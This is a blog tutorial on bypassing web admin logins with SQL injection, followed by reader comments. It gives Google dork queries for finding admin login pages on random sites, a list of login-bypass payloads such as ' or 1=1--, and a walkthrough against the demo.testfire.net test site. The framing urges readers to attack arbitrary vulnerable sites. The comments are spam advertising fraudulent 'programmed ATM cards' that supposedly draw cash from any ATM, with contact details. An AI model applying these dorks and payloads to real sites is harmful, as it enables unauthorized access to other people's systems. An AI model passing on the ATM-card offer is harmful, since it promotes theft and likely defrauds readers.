Hello Readers, Today I am sharing with you how to exploit web application by SQL Injection Attack. In this post step by step I show you how to bypass admin login using some queries
What is SQL Injection?
SQL Injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.
[Step – 1] Find SQL Injection Vulnerable Website
First we need vulnerable site to the attack. This is the first step in SQL injection exploitation and like every other hacking attack is the most time consuming, and is the only time consuming step.
1) By Google Dork
Google dorks are the center of the Google Hacking. Google database is the biggest so hackers use to exploit that database by using various search engine commands or complex search queries to locate sensitive data and vulnerable devices on the internet. For Example use this Google Dork to find randomly vulnerable website for SQL injection.
There is a large number of Google dork for basic SQL injection. Here is the best:
inurl:admin.asp
inurl:login/admin.asp
inurl:admin/login.asp
inurl:adminlogin.asp
inurl:adminhome.asp
inurl:admin_login.asp
inurl:administratorlogin.asp
inurl:login/administrator.asp
inurl:administrator_login.asp
2) By Automated Tools
Today many tools are available for found a vulnerable site. Tools make works easy and saving our time. Admin Page Finding tools which scans the vulnerable websites for administrator login pages. It makes use of a predefined list for finding the admin login pages. After finding the pages, it may present us the page on which we can login with the administrator password. “Actually finding admin page is nothing but just a directory of a particular website“.
you can use admin finder script (perl script) I share this script in my previous post. You can get this script and see the tutorial
[Step - 2] SQL Injection Queries
Here is some popular SQL injection queries list. We can use these to bypass login authentication. These queries confuse the databases.
‘or’’=’
admin'--
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
[Step – 3] Exploitation Web Applications by SQL Injection
After find admin page of any vulnerable web application. We can exploit that vulnerable web application using client supplied SQL queries. Its enable to execute unauthorized SQL commands.
For example, when a user logs onto a webpage by using user name and password for validation, a SQL query is used there. However an attacker can use SQL\ injection to send specially crafted username and password fields that poison the original SQL queries.
Let’s see an example that illustrates this kind of attack so that we can fully understand how it works. We have a sql vulnerable website
you can watch this demo
We found an SQL injection point for exploitation. In the image below we can see login page or user authentication form of this web site.
click here to see the page
www.demo.testfire.net has an authentication form for accessing the administration part of its Website. The authentication requires the user to enter a valid username and password. After sending a username and password, the application sends a query to the database to validate the user.
The query has the following format:
SELECT *
FROM admin
WHERE username = '[USER ENTRY]' AND password = '[USER ENTRY]'
.png)
The application doesn’t perform any sanitization of the received data, and therefore we have full control over what we send to the server. The authentication form requests a username and a password from the user. If we enter any random username and password the result page shows an “Invalid username or password” message.
The authentication requires the user to enter a valid username and password. We don’t know the valid user name and password. We inject here some SQL queries to bypass login. In username filed we type admin as a username and in password filed we set “or”=”
The query has the following format:
SELECT *
FROM admin
WHERE username = 'admin' AND password = '’or’’=’'
.png)
If the query runs successfully we will bypass the login without knowing username and password. In the below Image we can see we bypass login and we use admin panel as an administrator. We manage website contains as we want.
.png)
* In My next post we will discuss about Blind SQL Injection.
If you like this post then kindly Share with your friends and groups and hit like on sandeep.infocom Official or
thanks a lot for visit my page
Have you heard about programmed ATM card? email: (williamshackers@hotmail.com) for enquiring on how to get the ATM programmed card.
ReplyDeleteWe have special cash loaded programmed ATM card of $1000, $2000, $3000, $4000 and any amount your choice you need for you to buy your dream car, house and to start up your own business. Our ATM card can be used to withdraw cash at any ATM or swipe, stores and POS. Our card has daily withdrawal limit depending card balance you order. Contact us via Email if you need a card email: (williamshackers@hotmail.com)
BEST WAY TO HAVE GOOD AMOUNT TO START A GOOD BUSINESS or TO START LIVING A GOOD LIFE….. Hack and take money directly from any ATM Machine Vault with the use of ATM Programmed Card which runs in automatic mode. email (williamshackers@hotmail.com) or WhatsApp +15592016732… for how to get it and its cost... EXPLANATION OF HOW THESE CARD WORKS. You just slot in these card into any ATM Machine and it will automatically bring up a MENU of 1st VAULT $1,000, 2nd VAULT $2,000, RE-PROGRAMMED, EXIT, CANCEL. Just click on either of the VAULTS, and it will take you to another SUB-MENU of ALL, OTHERS, EXIT, CANCEL. Just click on others and type in the amount you wish to withdraw from the ATM and you have it cashed instantly… Done. ***NOTE: DON’T EVER MAKE THE MISTAKE OF CLICKING THE “ALL” OPTION. BECAUSE IT WILL TAKE OUT ALL THE AMOUNT OF THE SELECTED VAULT. email (williamshackers@hotmail.com) or WhatsApp +15592016732… We are located in USA.
ReplyDelete